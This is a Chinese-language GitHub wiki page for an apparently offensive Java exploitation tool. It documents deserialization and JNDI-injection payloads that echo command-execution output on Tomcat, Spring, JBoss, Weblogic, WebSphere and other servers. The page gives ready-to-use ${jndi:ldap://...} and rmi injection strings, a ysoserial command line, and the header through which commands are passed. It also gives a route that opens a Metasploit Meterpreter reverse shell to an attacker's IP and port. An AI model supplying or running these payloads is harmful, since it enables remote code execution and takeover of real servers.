Skip to content

4、JAVA RCE Echo

炁 edited this page Nov 12, 2024 · 9 revisions

可用参数

  • 命令 EX-AllEcho:DFS 找 Request 命令执行回显
  • 命令 EX-TomcatEcho:Tomcat 命令执行回显
  • 命令 EX-SpringEcho:Spring 命令执行回显
  • 命令 EX-JbossEcho:Jboss 命令执行回显
  • 命令 EX-JettyEcho:Jetty 命令执行回显
  • 命令 EX-LinuxEcho1:Linux 命令执行回显
  • 命令 EX-LinuxEcho2:Linux 命令执行回显
  • 命令 EX-ResinEcho:Resin 命令执行回显
  • 命令 EX-WeblogicEcho:Weblogic 命令执行回显
  • 命令 EX-WindowsEcho:Windows 命令执行回显
  • 命令 EX-ResinEcho:Resin 命令执行回显
  • 命令 EX-WebsphereEcho:websphere 命令执行回显

注意

在回显类前面加大写C即是构造方法实现,反之则在静态代码块中。

加这个的原因是重名类静态代码加载只会执行一次,如果你需要打入一次重复使用就加大写的C。 例如 EX-CTomcatEcho

使用说明

这个功能同时支持 JNDI Injection与恶意类的生成。

对于 Echo 类的回显,是基于在线程组中找到带有指定 Header 头部的请求、执行命令并回显的利用方式。

使用时在 Header 中加入 X-Token-Data 也可以自行指定,其值为待执行的命令,命令执行结果将回显在 response 中。

通过参数-ch cmd来自定义

  • JNDI-Injection-Exploit 用法:
  • 不需要参数时
${jndi:ldap://127.0.0.1:1389/ELProcessor/M-EX-TomcatEcho}
  • 需要参数时
${jndi:ldap://127.0.0.1:1389/ELProcessor/M-EX-TomcatEcho/shell/[base64_encoding:-ch cmd]}
${jndi:rmi://127.0.0.1:1389/ELProcessor/M-EX-TomcatEcho/shell/[base64_encoding:-ch cmd]}
  • ysoserial
java -jar JYso-[version].jar -y -g [Gadget] -p "EX-TomcatEcho" -ch "cmd"
  • 支持tomcatBypass路由直接上线msf:
  • 使用msf的java/meterpreter/reverse_tcp开启监听
ldap://127.0.0.1:1389/ELProcessor/E-Meterpreter/msf/[msf_ip]/[msf_port]
Clone this wiki locally